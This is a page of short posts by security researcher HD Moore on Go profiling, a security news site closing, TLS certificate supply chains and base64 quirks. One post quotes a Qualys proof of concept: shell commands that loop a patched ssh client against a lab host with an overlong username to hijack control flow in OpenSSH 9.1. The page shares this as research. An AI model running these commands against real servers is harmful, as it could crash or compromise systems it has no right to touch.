home > posts
  • March 5, 2023
    HD Moore
    @hdm

    @galdor@emacs.ch I like @mbmcloughlin's wrapper that puts pprof on it's own server and enable/configure this via environment variables: github.com/mmcloughlin/professor

    ↪ reply
  • March 2, 2023
    HD Moore
    @hdm

    Holy cow. The Daily Swig by PortSwigger, one of my favorite reads, is shutting down due to law suits and drama: https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig

    "We have written stories about numerous bad actors, some of whom are well-funded, and we have been obliged to pay settlements for malicious legal actions. We have sometimes been targeted by activists seeking to damage our software business because they dislike our story. This reality made it harder to justify continuing with the Swig."

    Thank you for the great articles over the years, you will be missed!

    ↪ reply
  • February 26, 2023
    HD Moore
    @hdm

    #golang  #infosec 

    I love using Burp Pro for security testing, but it's also weirdly good at finding deeply-buried concurrency issues and race conditions.

    #golang #infosec

    ↪ reply
  • February 14, 2023
    HD Moore
    @hdm

    This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92

    Here I was thinking this bug was hopeless and they one-line it without writing new code:

    $ cp -i /usr/bin/ssh ./ssh

    $ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh

    $ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
    "$user:$user" 192.168.56.123 ;done

    ...

    #1 0x4141414141414141 in ?? ()

    ↪ reply
  • February 8, 2023
    HD Moore
    @hdm

    A neat post by @foote & co at Fastly: A first look at Chrome's TLS ClientHello permutation in the wild https://www.fastly.com/blog/a-first-look-at-chromes-tls-clienthello-permutation-in-the-wild

    ↪ reply
  • December 29, 2022
    HD Moore
    @hdm

    #python  #infosec  #tls 

    Today’s fun turtle-chasing[0] moment was trying to understand how a python application validated TLS certificates. The application relies on the certifi package[1], which is built from the python-certifi github repository[2]. Both of these describe the source of this data as Mozilla, but they actually call an endpoint on the https://mkcert.org service hosted on Digital Ocean[3], which is built from the Lukasa/mkcert github repository[4]. The mkcert repository uses a Mercurial repository URL hosted by Mozilla[5]. This is fed by Mozilla’s CA inclusion process[6].

    Even ignoring the Mozilla CA process, the number of people and companies involved in bringing a static PEM file into your python application is mind-boggling.

    0. https://en.wikipedia.org/wiki/Turtles_all_the_way_down

    1. https://pypi.org/project/certifi/

    2. https://github.com/certifi/python-certifi/blob/master/Makefile

    3. https://mkcert.org/

    4. https://github.com/Lukasa/mkcert

    5. https://hg.mozilla.org/mozilla-central/raw-file/tip/security/nss/lib/ckfw/builtins/certdata.txt

    6. https://wiki.mozilla.org/CA/Included_Certificates

    #python #infosec #tls

    The unintentional irony of the mkcert.org landing page is 😘

    ↪ reply
  • December 26, 2022
    HD Moore
    @hdm

    Profound boredom is the root of all innovation. This paper covers it well, but every substantive project I worked on started offline with limited technical resources and lots of time to kill (metasploit, recog, runzero): https://www.bath.ac.uk/announcements/social-media-may-prevent-users-from-reaping-creative-rewards-of-profound-boredom-new-research/

    Offline doesn't mean no computing, just lack of boredom-driven-page-reloading. So erm, if you are seeing this, drop into offline mode, find a park, and fidget until you find something all-engrossing to sink your time into.

    ↪ reply
  • December 13, 2022
    HD Moore
    @hdm

    @0xtero@hachyderm.io right? it is super weird

    ↪ reply
  • December 13, 2022
    HD Moore
    @hdm

    Hi folks. Want to stop hearing about the bird site? Stop visiting it, stop linking to it, stop driving engagement, mute keywords, temporarily mute folks whinging about it. Just like the other commercial "social" networks, they thrive on misery and conflict, not community. Stop feeding it. It won't kill it, but your circle may stop talking about it.

    ↪ reply
  • December 10, 2022
    HD Moore
    @hdm

    Every few years I seem to forget that slightly different base64 strings can decode to the same bytes, even after excluding whitespace and the = padding.

    For example, 0xd5 is the decoded result for 1a=, 1b=, 1c=, 1d=, 1e=, and 1f= -- it makes total sense given the encoding algorithm, but sometimes throws a curveball into testing, especially if you assume different inputs are always going to lead to different outputs.

    I chased a "broken" test for an hour tonight before it clicked again. Happy Friday!

    ↪ reply
  • << View newer posts View older posts >>

Copyright 1998-2025 HD Moore